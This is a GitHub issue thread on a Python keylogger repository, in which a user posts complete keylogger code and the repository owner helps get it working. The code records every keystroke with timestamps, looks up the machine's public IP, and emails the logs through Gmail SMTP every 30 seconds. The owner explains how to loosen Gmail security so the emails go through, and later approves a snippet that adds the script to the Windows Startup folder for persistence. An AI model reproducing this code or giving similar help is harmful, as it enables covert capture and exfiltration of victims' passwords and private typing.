### ISSUE TITLE
Didn't recieve any email

### ISSUE THREAD

**Issue by Julooot** [Suvanth-Erranki/Advanced-Keylogger-in-Python#1]
Didn't recieve any email

Did I did something bad ?

`
from pynput.keyboard import Listener
from email.message import EmailMessage
import smtplib
import time
import os
import requests

class keylogger:

    def __init__(self, emailAddress, password):
        self.start_time = time.time()
        self.email = emailAddress
        self.password = password
        self.ip = requests.request('GET', 'https://api.ipify.org').text
        self.emailInterval = 30
        self.logFile = "output.txt"

    def keystroke_handler(self, key):
        dateTime = time.strftime("%m/%d/%Y %H:%M:%S")
        format = f'{dateTime}: {key}\n'
        with open(f"{self.logFile}", "a") as keylogFile:
            keylogFile = open("output.txt", "a")
            keylogFile.write(format)

        if (time.time() - self.start_time) > self.emailInterval:
            with open("output.txt", "r") as keylogFile:
                try:
                    keylogger.send_email(self)
                    print("Email sent successfully!")
                except smtplib.SMTPServerDisconnected:
                    print("Error: The server unexpectedly disconnected!")
                except smtplib.SMTPSenderRefused:
                    print("Error: Sender address refused.")
                except smtplib.SMTPDataError:
                    print("Error: The SMTP server refused to accept the message data.")
                except smtplib.SMTPConnectError:
                    print("Error: Failed to establish a connection with the server.")
                except smtplib.SMTPAuthenticationError:
                    print("Error: SMTP authentication went wrong. Most probably the server did not accept the username/password combination provided.")
                except Exception as e:
                    print(e)

            os.remove("output.txt")
            self.start_time = time.time()

    def send_email(self):
        
        dateTime = time.strftime("%m/%d/%Y %H:%M:%S")
        message = EmailMessage()
        message['Subject'] = f'Keylogs for {self.ip} - {dateTime}'
        message['From'] = self.email
        message['To'] = self.email
        message.add_attachment(open("output.txt", "r").read(), filename="output.txt")

        server = smtplib.SMTP('smtp.gmail.com', 587)
        server.starttls()
        server.login(self.email, self.password)
        server.send_message(message)
        server.quit()

    def main(self):
        with Listener(on_press=keylogger(self.email, self.password).keystroke_handler) as listener:
            listener.join()

keylogger("not gonna say", "not gonna say").main()
`

Thanks !

**Comment by Suvanth-Erranki** [comment]
Hey there @Julooot , did you import all the modules correctly? Remember, you have to do `pip install [modulename]`. Also, for the email, you have to put the @gmail.com part too. If you followed these steps, it should work. Please reach back to me with more details.

**Comment by Suvanth-Erranki** [comment]
Hey, I just realized, the issue you are facing is that Gmail automatically blocks python from sending emails because they consider it an insecure app. You can just enable the setting for your email to allow this at [https://myaccount.google.com/lesssecureapps](url)

**Comment by Suvanth-Erranki** [comment]
Please reach out to me and tell me if this works. I apologize for forgetting to include this in the readme file.

**Comment by Julooot** [comment]
Yes ! That's work perfectly ! Thanks you =D

**Comment by Julooot** [comment]
And just one more question, do you know how to execute the py file automaticly at the startup of the computer ?
I have do that but I don't know if this is good or not

` import getpass
def add_to_startup(file_path=""):
    if file_path == "":
        file_path = os.path.dirname(os.path.realpath(__file__))
    bat_path = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' % USER_NAME
    with open(bat_path + '\\' + "open.bat", "w+") as bat_file:
        bat_file.write(r'start "" %s' % file_path)
`

**Comment by Suvanth-Erranki** [comment]
I think that works, you can try testing it on your computer. Best of luck.
